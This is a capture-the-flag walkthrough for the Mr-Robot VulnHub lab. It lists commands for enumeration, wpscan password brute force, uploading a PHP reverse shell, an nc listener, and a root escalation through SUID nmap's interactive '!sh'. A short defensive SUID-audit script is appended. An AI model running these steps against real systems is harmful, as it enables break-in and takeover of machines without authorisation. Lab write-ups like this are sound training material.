Vulnhub | Mr-Robot :1 CTF Walk through | OSCP Model
Mr-Robot: 1 CTF (Capture The Flag) Walkthrough Summary (OSCP Model)
https://twitter.com/AppSecJay
https://www.linkedin.com/in/jaganboda/
Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
Step by step process:
Enumeration:
Step 1: Fire up the Kali VM and the Mr-Robot:1 VM. I start by figuring out the IP address of the machine, using the commands below.
nmap 192.168.0.0/24 -Pn -T4
netdiscover -r 192.168.0.0/24
Step 2: Try to find directories and interesting files with the commands below.
nikto -h 192.168.48.150
dirb http://192.168.48.150
Step 3: Download the files from the locations below and analyse them.
wget https://192.168.48.150/key-1-of-3.txt   # 1st key flag
wget http://192.168.48.150/fsocity.dic
Useful commands:
wc -l fsocity.dic   # word count in fsocity.dic (one word per line)
sort -u fsocity.dic > Newfsocity.dic   # remove duplicate entries
Step 4: Try to find a username. Try the default credentials admin:admin, then try the main characters of the Mr. Robot TV series, such as elliot, Mr Robot, Angela, Darlene and Tyrell, as the user name and analyse what kind of error is returned.
Gaining Access (Exploitation):
Step 5: Brute force the password using the word list built from the fsocity.dic file I found.
wpscan --url 192.168.48.150 --wordlist /root/Downloads/Newfsocity.dic --username elliot
Step 6: I make a note and head over to the WordPress login to see what we can get!
Step 7: Upload the PHP code (reverse shell payload) from Pentest Monkey, and execute it.
Note: Change the IP address and port according to your lab setup.
useful payload link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Step 8: Start a netcat listener:
nc -lvp 9999
Step 9: Browse to the page updated with the payload, http://192.168.48.150/404.php (in my case).
Step 10: Once you get a shell, look for the 2nd flag under the home directory. Analyse all available files and try to get hints from them.
Useful command: python -c 'import pty; pty.spawn("/bin/bash")'
Running the above line imports Python's pty module and spawns /bin/bash in a pseudo-terminal, which gives a proper interactive shell. From here I was able to run commands as normal.
Step 11: Try to crack the password of the robot user. Use this website: https://crackstation.net/.
Step 12: Switch to the robot user with the password cracked on CrackStation. Once you get the 2nd flag.
Privilege Escalation:
Step 13: Next we need to get into the root directory. Try to find interesting files.
Useful command: find / -perm -4000 2>/dev/null
I also notice the system has nmap installed. This is listed under the SUID section of the Linux enum script.
Just google "nmap privilege escalation".
Step 14: So I drop into nmap interactive mode (nmap --interactive) and run the following commands. And with that we have our final key!
Useful command: nmap --interactive
!sh
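The escalation above works only because nmap carries the set-uid bit. As an added example (not part of the original walkthrough), here is a defender-side audit built on the same find command that flags set-uid files missing from an expected list. The function names, the allowlist format and the sample tree are assumptions made for illustration.

```sh
#!/bin/sh
# Added example (not from the original walkthrough): allowlist-based SUID audit.
# All paths in demo() are constructed sample data inside a temp directory.

# Print every set-uid regular file under ROOT ($1) that is not listed,
# one absolute path per line, in the allowlist file ($2).
list_unexpected_suid() {
    # Fail closed: a missing allowlist must not look like a clean result.
    [ -r "$2" ] || { echo "allowlist not readable: $2" >&2; return 2; }
    find "$1" -xdev -type f -perm -4000 2>/dev/null |
        { grep -vxF -f "$2" || true; } | sort
}

# Exit status: 0 = only allowlisted SUID files, 1 = unexpected ones found
# (printed with owner and mode via ls -ld), 2 = audit could not run.
audit_suid() {
    unexpected=$(list_unexpected_suid "$1" "$2") || return 2
    [ -n "$unexpected" ] || return 0
    printf '%s\n' "$unexpected" | while IFS= read -r p; do ls -ld "$p"; done
    return 1
}

demo() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/usr/bin" "$t/usr/local/bin"
    : > "$t/usr/bin/passwd"; : > "$t/usr/local/bin/nmap"; : > "$t/usr/bin/ls"
    chmod 4755 "$t/usr/bin/passwd" "$t/usr/local/bin/nmap"   # set-uid bit on
    chmod 0755 "$t/usr/bin/ls"                               # ordinary binary
    printf '%s\n' "$t/usr/bin/passwd" > "$t/allow.txt"       # expected SUID
    audit_suid "$t" "$t/allow.txt"; rc=$?
    echo "audit exit status: $rc"
    rm -rf "$t"
}
demo
```

On a real host the same function would be pointed at / with an allowlist taken from a known-good install, and a non-zero exit status treated as an alert.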
Clean up:
Just restart the victim machine to clean up.